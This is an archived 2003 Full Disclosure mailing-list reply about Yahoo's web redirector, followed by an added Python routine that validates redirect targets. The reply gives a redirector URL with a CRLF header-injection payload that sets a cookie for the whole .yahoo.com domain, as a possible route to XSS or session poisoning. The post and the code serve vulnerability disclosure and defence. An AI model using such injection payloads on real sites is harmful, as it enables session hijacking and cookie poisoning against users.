Full Disclosure
mailing list archives
Re: CERT: Vulnerability in web redirectors
From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000
Georgi Guninski wrote:
Like this one?:
--------------------
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
--------------------
(may be wrapped)
That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/
It adds a cookie for the whole .yahoo.com domain; this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
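An added example, not part of the original post or of any Yahoo code: one way a redirector could validate the target that follows the `/*` separator before writing it into a `Location` header. The allow-list, the function names and the shortened `/S=1` prefix are assumptions made for the demonstration.

```python
from urllib.parse import unquote, urlsplit

# Constructed samples: the "/*target" tail of the two URLs in the post, prefix shortened.
PLAIN = "/S=1/*http://www.cryptome.org"
INJECT = ("/S=1/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20"
          "domain%3D.yahoo.com%3B%20path%3D/")
# Hypothetical allow-list for the demo; a real redirector supplies its own.
ALLOWED_HOSTS = frozenset({"www.cryptome.org"})


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so %250D%250A is treated like %0D%0A."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("target is encoded too deeply")


def decide(request_path, allowed_hosts=ALLOWED_HOSTS):
    """Return (status, detail): (302, location) or (400, reason)."""
    _, sep, raw = request_path.partition("/*")
    if not sep or not raw:
        return 400, "no redirect target"
    try:
        decoded = fully_decode(raw)
        parts = urlsplit(raw)
        host = parts.hostname
    except ValueError as exc:
        return 400, str(exc)
    # CR, LF or any other control character would end the Location header
    # line and let the rest of the target become new response headers.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return 400, "control character in target"
    if parts.scheme not in ("http", "https"):
        return 400, "scheme not allowed"
    if host not in allowed_hosts:
        return 400, "host not allowed"
    return 302, raw


if __name__ == "__main__":
    for path in (PLAIN, INJECT):
        print(decide(path))
```

The control-character check runs on the fully decoded value, while the value returned for the header is the original encoded string, so nothing decoded is ever echoed into the response.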